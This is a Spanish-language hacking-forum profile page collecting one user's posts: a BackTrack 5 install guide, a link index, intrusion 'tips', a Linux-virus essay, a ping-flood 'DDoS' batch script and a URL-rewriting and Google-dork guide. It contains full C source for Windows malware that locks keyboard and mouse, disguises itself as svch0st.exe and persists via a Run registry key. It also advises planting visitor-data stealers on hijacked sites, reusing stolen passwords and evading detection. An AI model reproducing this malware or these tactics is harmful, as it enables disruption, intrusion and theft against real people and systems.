Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Dr0B4ck

#1

Buenas Underc0de hoy vengo con este tutorial el cual tratara de cómo instalar Backtrack 5 muy bien espero que les sea de su agrado y pues empecemos:


-Bien antes que nada una pequeña info de la Distribucion:

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.

Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.1

Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 32 de la famosa lista "Top 100 Network Security Tools" de 2006.2




Bueno ahora si empecemos con el tutorial; Bueno chicos antes que nada tienen ir a la pagina de descarga para asi poderse descargar el distro:



Bien si ustedes quieren llenan esos datos no necesariamente tiene que ser obligatorio jeje bueno  ahora el siguiente paso es seleccionar todas la opciones bien para seguir con el tutorial ya que si te vienes empezando en el mundo Linux lo mejor sería solo guiarse no mas pero si eres avanzado pues cambiarle las opciones del distro ok, bueno solo seleccionen todo a como aparece en la imagen:




Bien ya teniendo esto le damos en el boton click to donwload y ahora dejamos que se descargue ok el archivo ISO pesa como 2 GB a algunos le saldra 1,9 pero es normal ok, Bueno prosigamos ahora abrimos el VMware workstation 6 aquí la podran descagar ;) :
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bien ya que se lo Descargaron ahora prosigamos lo abren se van a adonde dice NEW VIRTUAL MACHINE




Ahoralo dejan en Typical




Colocan la opción de instalar disco de imagen (ISO) y lo buscan:




Bien ahora en los sistemas Operativos Colocan la Opcion que dice Linux y en la versión colocan other Linux 2.6.xx kernel:



Ahora colocan el nombre que quieran en donde esta subrayado es donde tienen que poner el nombre:



Bien ahora le damos next y en el espacio en disco le dan lo que ustedes quieran claro mas de 20 gb basta yo le pondré 25:



Y dejamos las otras opciones como están ok, ahora le damos en next y y luego customize hardware



Ahora nos vamos a la opción de network adapter y lo colocamos a como se encuentra en la imagen:



Bien ahora le damos OK y luego FINISH e imediatamente se nor arrancara el Sitema Operativo, Bueno ya cuando les arranque y les salgan el boot le dan enter:



Y se nos abrirá un menú , es el menú de backtrack live cd:



Bien solo le damos enter a la opción que esta marcada y dejamos que cargue:



Dejamos que se nos cargue todo:



Bien ya después que se nos alla cargado nos mostrara la Shell del backtrack:



Bien ahora solo colocamos STARTX  y le damos enter:



Dejemos que se nos cargue todo y cuando ya se nos cargue nos saldrá la distro con sus menus fondo etc...xD



Bien ahora instalaremos la Distro para ello vamos a darle doble click al archivo que aparece en el escritorio llamado Install BackTrack



Puede que les dure caragando el archivo pero déjenlo que abra, Bien luego de que se les alla abierto colocan el idioma español:



Ahora en ese momento se les va a configurar el reloj :



Luego les pedirán donde se encuentran para poder confirmar:



Le damos adelante y nos toparemos con la distribución del teclado bueno esto generalemente backtrack se acomoda con el taclado español y si a ustedes no tienen que pner ese teclado solo pregunten donde crearon su teclado xD segurament en la caja de compra decía jjjee bueno algo asi tienen que poner:



En donde se encuentra subrayado el texto es para probar si el distro reconoce las teclas que tu quieres que salgan ok bueno seguimos adelante; Bien aquí es algo complicado para los que instalan el distro en una PC con otro sistema operativo ya que antes de hacer todo tienen que primero particionar el disco pero como en el caso de nosotros lo estamos instalando en una maquina virtual pues colocamos estas opciones:



Bien en si nomas se deja asi ya que el distro lo detecta jje pero si no les sale asi tienen que dejarlo a como sle en la imagen ok ;) bueno sigamos adelante



Ahora tan solo en esta ventana nos mostrara la información y todo y solo le tendríamos que dar Instalar para que se nos instale la distro, ya dándole instalar dejamos que se instale tranquilamente osea no se desesperen jeje



Bueno ya después de que se alla instalado y todo nos saldrá esto:



Le damos en reiniciar ahora y ya esta con esto tendríamos instalado la distro (talvez dure en reiniciarse pero déjenla xD valdrá la pena



Bueno ya cuando les salga esto osea el logueo ya para entrar a su distro instalado
Solo escriben ROOT (en minúscula) y le dan enter y luego en la password colocan TOOR (en minúscula) y luego les abrirá normalmente la distro como se les había mostrado bueno ahora de una vez vamos a colocar el backtrack en español, Bien primero Abrimos una terminal que generalmente en backtrack se encuentra arribita es como una ventanita negra xD




Bien y ahora escribimos en la terminal: apt-get install language-selector



A mi me dice que yo ya lo tengo instalado porque obvio lo tengo instalado jeje pero si a ustedes les pide en un momento poner S o N pongan S ok ahí si le salen verán que quiero decir ;) Bien ahora colocamos después gnome-language-selector para que se nos abra lo que acabamos de instalar xD



Aquí le daremos instalar y se nos empezaran a descargar los paquetes dejamos con mucha paciencia que haga la magia ok



Bien ya teniendo instalado los paquetes ahora solo le damos al botón que dice instalar y eliminar idiomas...



Y ahí les saldrá una lista de idiomas escojen a como gusten de hecho que español jeje lo palomean y luego aplicar cambios y listo dejan que se les descargue el paquete y lugeo solo seleccionan el idioma en la ventana que les aparece y le dan APLICAR A TODO EL SISTEMA y listo ya con eso tienen cambiado el idioma solo queda reiniciarlo y ya.


Bueno espero que les alla gustado el tutorial me llevo 2 dias prepararlo jeje si hay algo malo haganmelo saber para corregirme y correjirlo les mando un saludo a SPELINAX, ANTRAX, Xt3mP, Snifer, 2fac3r, Spectrus y a Yoya salu2 a todos amigos

by Dr0B4ck...
#2
Pentesting / [F.A.Q.] RECOPILACIÓN DE TEMAS
Noviembre 22, 2011, 01:52:29 AM
Buenas Amigos de Underc0de, bueno antes que nada con todo el respeto de Antrax , Xt3mP y los Moderadores del foro solo quize hacerlo porque pense que les hiba hacer algo de ayuda espero que les guste y tambien espero este bien Conformado salu2 !


Metasploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Herramientas de Pentest:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Manuales y Papers:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Sistema Operativos de Pentesting:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Otros:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dudas:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

P.D: El Glosario se estara Actualizando por cada Tema nuevo que se cree en el Subforo salu2 a todos !
#3
Pentesting / Tips para una Buena Intrusion en un sistema
Noviembre 22, 2011, 12:18:01 AM
Buenas Underc0de espero que anden bien y que les agrade el tuto salu2 amigos !!!


Reconocimiento del Objetivo.

Todo empieza en el momento en que deseamos colocar a prueba un sistema de información o porque no toda una infraestructura de red, lo primero como todos saben es conocer nuestro objetivo, es decir, necesitamos saber todo acerca de lo que deseamos atacar, no tiene que ser precisamente colocandole a correr un scan de vulnerabilidades como locos, de hecho esta opción no es recomendable. Eres de los que usa Acunetix para probar vulnerabilidades de un sitio, durante un ataque real?, no es aconsejable, debido a que es muy escandaloso, lo primero que van a lograr es alertar al encargadado de la red o del sistema, lo aconsejable es hacerlo manualmente,ojala en horas en que sepamos que el admin del sitio duerme, con calma, mirando todos los puntos de entrada y salida de información. Un Scan de puertos es una buena opción. Aun asi, con estas medidas de prevención no estamos seguros, debemos desde el inicio usar alguna vpn, y bueno no lo hagan desde sus casas. "Si si, es reparanoico, pero es mejor". Y por ultimo, supremamente recomendable, mirar los DNS, es un lugar donde a veces se encuentran cosas muy interesantes.

Ataque Inderecto

Aqui tambien es importante tener en cuenta que para llegar a mi objetivo no necesariamente debe ser un ataque directo, es decir, podemos mirar sus subdominios "en el caso de un sitio web", podemos mirar quienes desarrollaron el sistema, o que fabricante provee algun tipo de software o aplicativo, con el fin de testear otros sistemas, Como asi?, bien pues veran, si pepito se dedica a hacer cajas fuertes super seguras, es probable que pepito antes de llegar a su modelo de caja actual, tuvo que pasar por varias etapas, en las que creo modelos de cajas no tan seguras, si lograramos a partir de una caja no tan segura, encontrar un patro de diseño, podriamos penetrar una de sus cajas fuertes actualies super seguras.


Caso practico que me sucedio, tenia un aplicativo web en su ultima version y usado masivamente sin ningun bug visible, busque versiones previas, encontre algunos bugs, explote, y me di cuenta de un usuario por default, solo fue cuestión de ir al aplicativo en su ultima version y testearle el usuario por default, y efectivamente lo tenia. Si si, no siempre funciona pero hay que considerar todas las posibilidades


Analisis de informacion.


Bueno ya tenemos un listado de información y de versiones de diferentes servicios y aplicaciones de nuestro sistema objetivo, apartir de aquí viene un proceso de investigación, como asi?, bien pues por ejemplo, si tenemos php 4, pues debemos preguntarnos, que cambios existen entre php 4 y el actual?, esos cambios fueron correcciones de seguridad?, si es así, hay que ver de que manera esa versión de php nos va a servir en nuestra intrusión. Asi mismo con los servicios,cms etc. Bueno si es su ultima version, no olviden el punto anterior, y bueno si no hay mas opción, busquemos un 0day en el aplicativo o en el servicio.


Explotando

En este punto, despues de una gran recopilación de versiones, de posibles vulnerabilidades, le probamos algunas vulnerabilidades, obviamente con las medidas de precausion necesarias.

Despues de explotar algunos bugs, nos podemos topar con los siguientes lios:

Tengo un password y no encontre el admin panel o no me funciona el password en el admin panel que tengo que hago?

Buscate todos los pass de la bd que correspondan a usuarios con privilegios "De donde los sacas?, de donde sacaste el pass que tienes", y prueba esos pass en sus mails, busca el cpanel del sitio.

Ese pass que tienes, pruebalo en todos los servicios que puedas, y en todas las partes que puedas, pues probablemente usan el mismo password en otros servicios, ftp, base de datos, cpanel, y otros sistemas.



LLegamos al panel del admin, y no puedo subir archivos que hago?

En este punto, se supone que podemos modificar el contenido del sitio. Asi que es recomendable hacer algo de client inside penetratio testing, es decir, ponte un analizador de navegadores y un stealer de informacion de los visitantes o programate uno, y ponlo por medio del contenido que puedes modificar, y obten las ip, y determina, la información del admin del sitio, verifica que navegador usa, y busca vulnerabilidades de ese navegador, y explota una vulnerabilidad del navegador desde su propio servidor, la idea es aprovechar la confianza que el tiene en su sitio.

Mi objetivo está en de MZ, y estoy en la DMZ, y la infraestructura de red implementa un modelo de seguridad en profundidad, es decir, hay un firewall que divinen de MZ y la DMZ, como llego a mi objetivo?

Para resolver este punto preguntate que hay de comun entre la DMZ y la MZ?, seria que los usuarios de la MZ tienen de pagina de inicio la web que de la que te apodareste?, puedes investigar las versiones de los navegadores de esos usuarios?. Si es asi, prueba explotar vulnerabilidades en sus navegadores, prueba hacer un reverse shell pero al servidor en la DMZ del cual tienes control, porq?, si es un sistema complejo el proxi no dejara sacar la conexión tan facilmente, y no solo el proxy, también las N capas de seguridad que tengan.

Complicandolo un poco mas.

Si el sistema es muy complejo porque usan Certificados Digitales, y no puedes realizar captura de paquetes con sniifers ni nada de eso, no entres en panico, si usan certificados digitales 2048 bits relax, pues ya sabes que estan asegurando el protocolo http, asi que cambiate de capa, explota la capa de aplicación, pueden tener la super seguridad en todas sus capas, pero pocos se preocupan por la seguridad en la capa de aplicación, como asi?, si, un CSRF es un CSRF con o sin HTTPS, el cruce de dominio por falsificación de petición va ligado de las propiedades del nagevador, si el navegador tiene el certificado, el CSRF no deberia tener problema.


Subi una shell pero hay modo seguro que hago?.

Verifica versiones del servidor web y de las tecnologias que soportan, y verifica que tengan las ultimas, si no es así, aprovecha y verifica si existen formas de saltar el modo seguro en esas versiones de tecnologias.

By _84kur10_
#4
Buenas Underc0de, sean bienvenidos a mi post, esta vez estare enseñando como crear un programa o virus, como ustedes lo quieran llamar, que bloquea el sistema, el raton y el teclado, solo tienen que añadirlo al inicio en el registro y todo esto sin ser detectado por ningun AntiVirus.

Código: c
#include <windows.h>
#include <tlhelp32.h>
#include <winable.h>


#define BUFSIZE 80

int test_key(void);
int create_key(char *);



int main(void)
{
int test,create;
test=test_key();

if (test==2)
{
char *path="c:\\WINDOWS\\svch0st.exe";
create=create_key(path);

}

HWND inv;
AllocConsole();
inv=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(inv,0);
int c;

for(;;)
{
BlockInput(true);
}
char root[60]="C:\\Windows\\";
char nombre[60]="svch0st";
char path[256]="svch0st";
strcat(nombre,".exe");
strcat(root,nombre);
HMODULE copiar = GetModuleHandle(0);
GetModuleFileName(copiar, path, 256);
CopyFile(path,root,false);
}

int test_key(void)
{
int check;
HKEY hKey;
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
int reg_key;

reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
if(reg_key!=0)
{
check=1;
return check;
}

reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);

if((reg_key!=0)||(buf_length>BUFSIZE))
check=2;
if(reg_key==0)
check=0;

RegCloseKey(hKey);
return check;
}

int create_key(char *path)
{
int reg_key,check;

HKEY hkey;

reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path));
check=0;
return check;
}
if(reg_key!=0)
check=1;

return check;

}



By Darax.
#5
GNU/Linux / ¿¿Porque en Linux Nunca Hay Virus??
Noviembre 21, 2011, 08:28:00 PM
Buenas Underc0de aqui voy a postear algo interesante espero que les interese  ;D



"Los virus son la pesadilla de los administradores, cada mes aparecen mas de 30 mil y es un hecho que las actualizaciones mensuales de los antivirus no los incluyen a todos. Para los usuarios no expertos también son una molestia, los antivirus pueden hacer que una computadora pierda hasta el 30% de su veocidad. Cada año cientos de millones de dólares se pierden en horas/hombre (y horas/mujer   ;-) ) por los virus en todo el mundo.

Para que un programa sea considerado como un virus debe cumplir dos requisitos:

1) Que se copie a sí mismo
2) Que se  propague de manera "natural" entre los sistemas


ANDRES MALPARICULILAMBIDO -Los //gusanos// son programas que aprovechan un //exploit// (error en el código de un programa) para infiltrarse en un sistema. Los //troyanos// son gusanos que abren un puerto trasero para permitir que una persona ajena entre al sistema. La diferencia principal entre los virus y los gusanos radica en que los virus se propagan sólos por la red, mientras que alguien (un hacker) debe realizar acciones especificas para implantar un gusano. Por cada máquina atacada por un gusano existen miles (quizás millones) de equipos infectados por virus. En GNU/Linux hay gusanos y troyanos, pero no virus.

Con frecuencia he escuchado la opinion de "expertos" que argumentan que en Linux no hay virus porque hay pocos equipos con este sistema operativo, pero que en cuanto se vuelva más popular los virus aparecerán. Obviando el hecho de que Unix/Linux poseen el 40% del mercado de servidores, esta opinión revela las pobres expectativas que Microsoft le ha impuesto al usuario común, pues según éste, es normal que todos los sistemas operativos sean afectados por los virus. Pero en realidad, solo Windows padece de los virus. No todo es culpa de Microsoft, no ha sido fácil llevar a un sistema operativo tan deficiente como Windows95 al exigente mundo de los servidores: en busca de un buen desempeño, se ha debido de pagar un precio en la seguridad de Windows XP y Windows 2003, quizás un precio demasiado alto.


El hecho, sin embargo, es que en Linux no hay ni habrá virus, (la verdad es que en ningún sistema operativo deberían de existir los virus), la razón radica en la gestión de memoria y la asignacion de permisos por omisión, los cuales hacen imposible que un programa no autorizado se ejecute y propague. Varias consultoras reportan que los servidores mas atacados en Internet son los basados en Linux, y la gran mayoria sale victorioso de la prueba. Sin embargo, esto no significa que este sistema operativo sea invulnerable: los programas y el mismo kernel poseen fallas que al ser explotadas permiten que, en casos extremos, un extraño tome control del equipo. La mejor manera de prepararse para un ataque es siendo uno mismo un hacker, escaneando los puerto de nuestro server, inyectando SQL en nuestras paginas web y tratando de ejecutar codigo malicioso. Lo más importante es frecuentar sitios que informen sobre fallos de seguridad, como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y buscar actualizaciones para nuestro sistema cada siete dias. Existen muchas soluciones que automatizan este proceso."

Espero que no queden dudas!

fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6
Bugs y Exploits / DDos Attack (explicacion) Mediante CMD
Noviembre 18, 2011, 07:15:43 PM
Buenas Underc0de espero que anden bien todos bien empesemos con el tutorial ;D

¿Que significa DDOS Attack?

DDOS (Distributed Denial Of Service Attack)

Bien sabiendo que es prosigamos:

-Este es un ataque de denegacion de servicio Distribuido que se realiza con solo tener la IP de la computadora de su enemigo, amigo etc...;
lo que hace esto es provocar un mal funcionamiento en el servidor lo cual hace que se caiga.
-Tambien hay herramientas que aun son mas potentes y con muchas tools solo es cuestion de que ustedes busquen  ;) ahora vamos a crear un script en batch para tener un metodo mas practico jeje (para los que no le gustan los comandos).


Código: php
@echo off
echo DD0s Att4ck v.1.0.0
echo *******/.\********
echo By Dr0B4ck
echo http://dr0b4ck-lab.com.ar/
echo *******/.\********
echo Yeahh...!!!!
ping xx.xx.xx.xx -t -l 15000
pause


Bien solo guardan ese codigo en un block de notas con la extencion .bat o .exe y luego lo abren y listo ah y casi se me olvida, donde estan las xx.xx.xx.xx ponen la IP de la victima ok y luego nomas habren el mismo programita unas 10 o 20 veces  8) y luego esperan a que se les caiga el servidor jeje ahora para los comanderos aqui hay algo tambien para ustedes:

-Bueno solo abren CMD y colocan esto ping xx.xx.xx.xx -t -l 15000 y ya saben que donde xx.xx.xx.xx ponen la IP y aun mas practico abren las ortas CMD`s y les dan la flecha hacia arriba para que no escriban tanto el comando ok bueno esto es todo.

algo asi les tiene que salir esto es una imagen que encontre en la Net ok:




Bueno salu2 amigos
#7
Bugs y Exploits / Url`s amigables "su uso y explicacion"
Noviembre 14, 2011, 11:35:44 PM
Buenas Underc0de espero que les guste mi post seguro aqui estara bien explicado xD bueno salu2 cuidence.




Diccionario:

mod_rewrite: es uno de los modulos de un servidor web apache que nos permite atraves de .htaccess reescribir URL`s con esto nos permite ocultar los parametros de nuestra pagina web..

Dork: es como un trozo de codigo complatible con la busqueda de Google u otros buscadores que te ayudan a conseguir muchisma informacion que no puedas encontrar..

Esas son las definiciones ahora con el tuto en concreto:

bueno como ya saben el pequeño diccionario sus significados y todo voy a dar un ejemplo de lo que quiero decir y con su continuacion el tutorial; como por ejemplo:

noticia.php?id=1 (esta seria una url normal que vemos todos los dias)

algunas paginas usan este metodo para asi dificultar una inyeccion SQL ya que con el mod_rewrite se escribira la url asi:

noticia/1 (url amigable precisamente se encuntran en paginas muy importantes ! para que no les hagan "DAÑOS")

para poder obtener ese tipo de url se necesita implementar este codigo:

<IfModule mod_rewrite.c>
Options +FollowSymLinks
RewriteEngine on
RewriteRule ^listado_de_noticias/([0-9]+) noticia.php?id=$1 [L,NC]
</IfModule>

con esto la ocultamos y restringimos el acceso como dije a inyecciones mediante .htaccess; pero con esto no hay que confiarze mucho porque al tener el archivo php final y si tiene problemas con inyeccion siempre lo seguira teniendo osea de que si el atacante tiene acceso a la pagina php y aun asi tu tengas el mod_rewrite te hace trizas tu web...

bueno ahora si por ejemplo tu vas a ser uno de los atacantes tienes que tener mucha imaginacion con este tipo de url te dare unos ejemplos e ideas...


bueno usa una idea algo asi mas o menos eso queda en ti y en tu mente:

www.paginaweb.com/noticias/1


con esto podriamos agarrar un papelito y escribir varias opciones e ideas tales como:

www.paginaweb.com/noticias.php?id=1

www.paginaweb.com/noticias.php?idnoticias=1

u otras ideas eso depende de la url bueno ahora si te da algo un poco tedioso estar intetando puedes solicitar ayuda a un buen amigo FIEL de nosotros "GOOGLE"

site:miweb.com inurl:.php

con este pequeño DORK puedas buscar mucha informacion la forma de usarlo es casi igual imaginando :

site:www.paginaweb.com inurl:noticia.php?id=1

uno de los buscadores mejores aparte de Google es este:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

este buscador al igual que google guarda un buen historial de paginas web y beuno el dork lo que hace sencillamente es buscar en el historial del buscador todas las url`s o link`s relacionadas con este

y bueno amigos espero que les alla gustado y enrealidad este post fue improvisado no lo tenia preparado ni nada xD les mando un gran saludo y practiquen mucho...!!!!
#8
Hola underc0de cordial salu2 a todos amigos aqui dejo mi revista actuaizada ok solo quiero dejar claro una cosa amigos yo antes era s4w-3xpl0it3r ya para nadie es un secreto que me cambie de nick amigos ok aqui les dejo mi portada amigos para que la disfruten ehmm ah y casi se me olvida ya converti en archivo en pdf y ya no les molestara los errores de autografia xDDD bueno salu2 y cuidense amigos las revista la hice dedicada para underc0de si no me creen bajenselo y vallanse a la parte de despedida  ;)

LINK:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
P.D: si se cae el link o algo asi me avisan...acepto criticas y opiniones....